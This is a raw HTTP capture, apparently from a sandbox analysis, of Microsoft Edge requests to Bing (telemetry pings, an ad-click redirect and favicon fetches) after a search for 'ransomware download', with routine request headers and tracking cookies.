/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220739355%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220739987%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220740133%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 200
pragma: no-cache
content-type: text/html; charset=UTF-8
expires: Fri, 01 Jan 1990 00:00:00 GMT
p3p: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
referrer-policy: origin
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 4541E3D61E654CE688151B6E9C3F2C13 Ref B: LTSEDGE1411 Ref C: 2024-02-29T15:32:26Z
date: Thu, 29 Feb 2024 15:32:26 GMT
content-length: 2912
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220746.b3240f2
-
Remote address:92.123.128.152:443RequestPOST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 2652
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 204
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: B34F3C3F19B04CFAA1589D423AD017AA Ref B: LON04EDGE1119 Ref C: 2024-02-29T15:32:26Z
date: Thu, 29 Feb 2024 15:32:26 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220746.b324160
-
POSThttps://www.bing.com/fd/ls/GLinkPingPost.aspx?IG=92027AEB1C3C42769F3D4EA5938FBAC6&ID=SERP,5821.1,Ads&url=https%3A%2F%2Fwww.bing.com%2Faclk%3Fld%3De89lQxGSBQhj25FIWRaijH0TVUCUxqK7zGAdhob7g3cXGgpijWu33dAfTu4J1h7YxIuDA_7d4H18SS7fvOCymR0J3_8bmYzDBtVq91Elx-TzAWANV5PQc7HyhKjZvHubfnivVIn-MDCmpG9LXSt9cQGTlwMqm7DTStXtvNWr4bkxRtPExr%26u%3DaHR0cHMlM2ElMmYlMmZzb3NhZmUtYXdhcmVuZXNzLmNvbSUyZnJlc291cmNlcyUyZnJlcG9ydHMlMmZjeWJlcmNyaW1lLXRyZW5kcyUyZiUzZnV0bV90ZXJtJTNkQ3liZXIlMjUyMHRocmVhdCUyNnV0bV9jYW1wYWlnbiUzZFVLSV9FTl9Ob24tYnJhbmRlZF9RMTIwMjMlMjZ1dG1fc291cmNlJTNkYmluZyUyNnV0bV9tZWRpdW0lM2RwYWlkJTI2aHNhX2FjYyUzZDIzMTU2MDk3MzclMjZoc2FfY2FtJTNkMTk1NjY4NDQ1MjklMjZoc2FfZ3JwJTNkMTE3MDk4MTcxODI1MTEwMyUyNmhzYV9hZCUzZCUyNmhzYV9zcmMlM2RvJTI2aHNhX3RndCUzZGt3ZC03MzE4NzA1MDkyNTk0MCUzYWxvYy0xODglMjZoc2Ffa3clM2RDeWJlciUyNTIwdGhyZWF0JTI2aHNhX210JTNkcCUyNmhzYV9uZXQlM2RhZHdvcmRzJTI2aHNhX3ZlciUzZDMlMjZtc2Nsa2lkJTNkMGJlNWFkZWQwNTk1MThiNThlMTljODBkYTZmMTBkNjYlMjZ1dG1fY29udGVudCUzZEN5YmVyJTI1MjB0aHJlYXRz%26rlid%3D0be5aded059518b58e19c80da6f10d66%26ntb%3D1msedge.exeRemote address:92.123.128.152:443RequestPOST /fd/ls/GLinkPingPost.aspx?IG=92027AEB1C3C42769F3D4EA5938FBAC6&ID=SERP,5821.1,Ads&url=https%3A%2F%2Fwww.bing.com%2Faclk%3Fld%3De89lQxGSBQhj25FIWRaijH0TVUCUxqK7zGAdhob7g3cXGgpijWu33dAfTu4J1h7YxIuDA_7d4H18SS7fvOCymR0J3_8bmYzDBtVq91Elx-TzAWANV5PQc7HyhKjZvHubfnivVIn-MDCmpG9LXSt9cQGTlwMqm7DTStXtvNWr4bkxRtPExr%26u%3DaHR0cHMlM2ElMmYlMmZzb3NhZmUtYXdhcmVuZXNzLmNvbSUyZnJlc291cmNlcyUyZnJlcG9ydHMlMmZjeWJlcmNyaW1lLXRyZW5kcyUyZiUzZnV0bV90ZXJtJTNkQ3liZXIlMjUyMHRocmVhdCUyNnV0bV9jYW1wYWlnbiUzZFVLSV9FTl9Ob24tYnJhbmRlZF9RMTIwMjMlMjZ1dG1fc291cmNlJTNkYmluZyUyNnV0bV9tZWRpdW0lM2RwYWlkJTI2aHNhX2FjYyUzZDIzMTU2MDk3MzclMjZoc2FfY2FtJTNkMTk1NjY4NDQ1MjklMjZoc2FfZ3JwJTNkMTE3MDk4MTcxODI1MTEwMyUyNmhzYV9hZCUzZCUyNmhzYV9zcmMlM2RvJTI2aHNhX3RndCUzZGt3ZC03MzE4NzA1MDkyNTk0MCUzYWxvYy0xODglMjZoc2Ffa3clM2RDeWJlciUyNTIwdGhyZWF0JTI2aHNhX210JTNkcCUyNmhzYV9uZXQlM2RhZHdvcmRzJTI2aHNhX3ZlciUzZDMlMjZtc2Nsa2lkJTNkMGJlNWFkZWQwNTk1MThiNThlMTljODBkYTZmMTBkNjYlMjZ1dG1fY29udGVudCUzZEN5YmVyJTI1MjB0aHJlYXRz%26rlid%3D0be5aded059518b58e19c80da6f10d66%26ntb%3D1 HTTP/2.0
host: www.bing.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 200
content-length: 4286
content-type: image/x-icon
last-modified: Mon, 01 Jan 1601 00:00:00 GMT
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 0FD04CFC1A1E485B9EBD8B31934F6D09 Ref B: LTSEDGE0810 Ref C: 2022-12-09T13:31:02Z
date: Thu, 29 Feb 2024 15:32:26 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220746.b324274
-
GEThttps://www.bing.com/aclk?ld=e89lQxGSBQhj25FIWRaijH0TVUCUxqK7zGAdhob7g3cXGgpijWu33dAfTu4J1h7YxIuDA_7d4H18SS7fvOCymR0J3_8bmYzDBtVq91Elx-TzAWANV5PQc7HyhKjZvHubfnivVIn-MDCmpG9LXSt9cQGTlwMqm7DTStXtvNWr4bkxRtPExr&u=aHR0cHMlM2ElMmYlMmZzb3NhZmUtYXdhcmVuZXNzLmNvbSUyZnJlc291cmNlcyUyZnJlcG9ydHMlMmZjeWJlcmNyaW1lLXRyZW5kcyUyZiUzZnV0bV90ZXJtJTNkQ3liZXIlMjUyMHRocmVhdCUyNnV0bV9jYW1wYWlnbiUzZFVLSV9FTl9Ob24tYnJhbmRlZF9RMTIwMjMlMjZ1dG1fc291cmNlJTNkYmluZyUyNnV0bV9tZWRpdW0lM2RwYWlkJTI2aHNhX2FjYyUzZDIzMTU2MDk3MzclMjZoc2FfY2FtJTNkMTk1NjY4NDQ1MjklMjZoc2FfZ3JwJTNkMTE3MDk4MTcxODI1MTEwMyUyNmhzYV9hZCUzZCUyNmhzYV9zcmMlM2RvJTI2aHNhX3RndCUzZGt3ZC03MzE4NzA1MDkyNTk0MCUzYWxvYy0xODglMjZoc2Ffa3clM2RDeWJlciUyNTIwdGhyZWF0JTI2aHNhX210JTNkcCUyNmhzYV9uZXQlM2RhZHdvcmRzJTI2aHNhX3ZlciUzZDMlMjZtc2Nsa2lkJTNkMGJlNWFkZWQwNTk1MThiNThlMTljODBkYTZmMTBkNjYlMjZ1dG1fY29udGVudCUzZEN5YmVyJTI1MjB0aHJlYXRz&rlid=0be5aded059518b58e19c80da6f10d66&ntb=1msedge.exeRemote address:92.123.128.152:443RequestGET /aclk?ld=e89lQxGSBQhj25FIWRaijH0TVUCUxqK7zGAdhob7g3cXGgpijWu33dAfTu4J1h7YxIuDA_7d4H18SS7fvOCymR0J3_8bmYzDBtVq91Elx-TzAWANV5PQc7HyhKjZvHubfnivVIn-MDCmpG9LXSt9cQGTlwMqm7DTStXtvNWr4bkxRtPExr&u=aHR0cHMlM2ElMmYlMmZzb3NhZmUtYXdhcmVuZXNzLmNvbSUyZnJlc291cmNlcyUyZnJlcG9ydHMlMmZjeWJlcmNyaW1lLXRyZW5kcyUyZiUzZnV0bV90ZXJtJTNkQ3liZXIlMjUyMHRocmVhdCUyNnV0bV9jYW1wYWlnbiUzZFVLSV9FTl9Ob24tYnJhbmRlZF9RMTIwMjMlMjZ1dG1fc291cmNlJTNkYmluZyUyNnV0bV9tZWRpdW0lM2RwYWlkJTI2aHNhX2FjYyUzZDIzMTU2MDk3MzclMjZoc2FfY2FtJTNkMTk1NjY4NDQ1MjklMjZoc2FfZ3JwJTNkMTE3MDk4MTcxODI1MTEwMyUyNmhzYV9hZCUzZCUyNmhzYV9zcmMlM2RvJTI2aHNhX3RndCUzZGt3ZC03MzE4NzA1MDkyNTk0MCUzYWxvYy0xODglMjZoc2Ffa3clM2RDeWJlciUyNTIwdGhyZWF0JTI2aHNhX210JTNkcCUyNmhzYV9uZXQlM2RhZHdvcmRzJTI2aHNhX3ZlciUzZDMlMjZtc2Nsa2lkJTNkMGJlNWFkZWQwNTk1MThiNThlMTljODBkYTZmMTBkNjYlMjZ1dG1fY29udGVudCUzZEN5YmVyJTI1MjB0aHJlYXRz&rlid=0be5aded059518b58e19c80da6f10d66&ntb=1 HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 204
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 1318880D4FEC43518DADFE1278052E55 Ref B: LTSEDGE0821 Ref C: 2024-02-29T15:32:31Z
date: Thu, 29 Feb 2024 15:32:31 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220751.b326ca9
-
Remote address:92.123.128.152:443RequestPOST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 860
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 34EF0CA285EE4781ADE7535217B34073 Ref B: LON04EDGE0922 Ref C: 2024-02-29T15:32:31Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:31 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220751.b326ca8
-
Remote address:92.123.128.152:443RequestGET /favicon.ico HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 6A726ACB72F645B19F45C7668A3560AA Ref B: LTSEDGE2116 Ref C: 2024-02-29T15:32:32Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:32 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220752.b326e23
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:31,%22BC%22:31,%22SE%22:-1,%22TC%22:-1,%22H%22:141,%22BP%22:145,%22CT%22:146,%22IL%22:10},%22ad%22:[43,396,1263,609,1263,4731,1],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:31,%22BC%22:31,%22SE%22:-1,%22TC%22:-1,%22H%22:141,%22BP%22:145,%22CT%22:146,%22IL%22:10},%22ad%22:[43,396,1263,609,1263,4731,1],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01 HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
